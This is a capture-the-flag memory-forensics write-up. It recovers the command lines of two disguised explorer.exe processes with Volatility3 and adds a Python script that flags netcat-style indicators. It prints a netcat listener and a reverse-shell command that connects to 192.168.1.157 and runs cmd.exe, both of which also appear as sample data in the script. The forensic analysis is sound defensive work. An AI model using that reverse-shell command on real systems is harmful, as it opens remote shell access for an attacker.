Commands
Challenge:
What was the command used with the malicious explorer.exe? Submit the entire command as the flag: flag{program.exe --options argument}. Use the file from Captured Memories.
Solution:
From the previous challenge, Evil Twin, I knew there were two suspicious explorer.exe processes, PIDs 5448 and 3100. I used Volatility3's CmdLine plugin to extract the command line arguments from each process:
$ vol.py -qf mem.raw windows.cmdline.CmdLine --pid 5448
5448 explorer.exe explorer.exe -lnvp 6666
$ vol.py -qf mem.raw windows.cmdline.CmdLine --pid 3100
3100 explorer.exe explorer.exe 192.168.1.157 6666 -e cmd.exe
The wording of the challenge description suggests that there was a single malicious explorer.exe process when in fact there are two, so I tried submitting both and the accepted flag was flag{explorer.exe 192.168.1.157 6666 -e cmd.exe}.
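As an added example (not part of the original writeup), a small Python triage script that parses rows shaped like the CmdLine plugin output above and flags the netcat-style indicators seen in this case; the sample rows, the regexes and the full-path heuristic are constructed assumptions for illustration, not Volatility's own logic.

```python
import re

# Constructed sample rows, shaped like the quiet-mode output of
# `vol.py -q -f mem.raw windows.cmdline.CmdLine` (PID, process, args).
SAMPLE_CMDLINE_OUTPUT = """\
PID Process Args
4096 explorer.exe C:\\Windows\\Explorer.EXE
5448 explorer.exe explorer.exe -lnvp 6666
3100 explorer.exe explorer.exe 192.168.1.157 6666 -e cmd.exe
1234 svchost.exe C:\\Windows\\system32\\svchost.exe -k netsvcs
"""

# Netcat-style indicators that do not belong on an Explorer command line.
LISTEN_FLAGS = re.compile(r"(?:^|\s)-l\S*")        # -l, -lvp, -lnvp ...
EXEC_FLAG = re.compile(r"(?:^|\s)-e\s+\S+")        # -e cmd.exe
IP_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")  # 192.168.1.157 6666

def parse_cmdline_rows(text):
    """Yield (pid, process, args) from whitespace-separated plugin rows."""
    for line in text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 2 or not parts[0].isdigit():
            continue  # header, blank or truncated line
        yield int(parts[0]), parts[1], (parts[2] if len(parts) == 3 else "")

def triage_cmdlines(text):
    """Return (pid, process, args, reasons) for rows with shell-like indicators."""
    findings = []
    for pid, proc, args in parse_cmdline_rows(text):
        reasons = []
        if LISTEN_FLAGS.search(args):
            reasons.append("listen flag")
        if EXEC_FLAG.search(args):
            reasons.append("-e program execution")
        if IP_PORT.search(args):
            reasons.append("bare IP and port")
        # Heuristic (assumption): a legitimate Explorer is normally started as
        # C:\Windows\Explorer.EXE, so a bare "explorer.exe" argv[0] is suspicious.
        if proc.lower() == "explorer.exe" and not args.lower().startswith("c:\\"):
            reasons.append("explorer.exe started without its full path")
        if reasons:
            findings.append((pid, proc, args, reasons))
    return findings

if __name__ == "__main__":
    for pid, proc, args, reasons in triage_cmdlines(SAMPLE_CMDLINE_OUTPUT):
        print(pid, proc, "|", args, "|", ", ".join(reasons))
```

Both masquerading processes are flagged while the legitimate Explorer and svchost rows pass; feeding it the real plugin output via stdin is a one-line change.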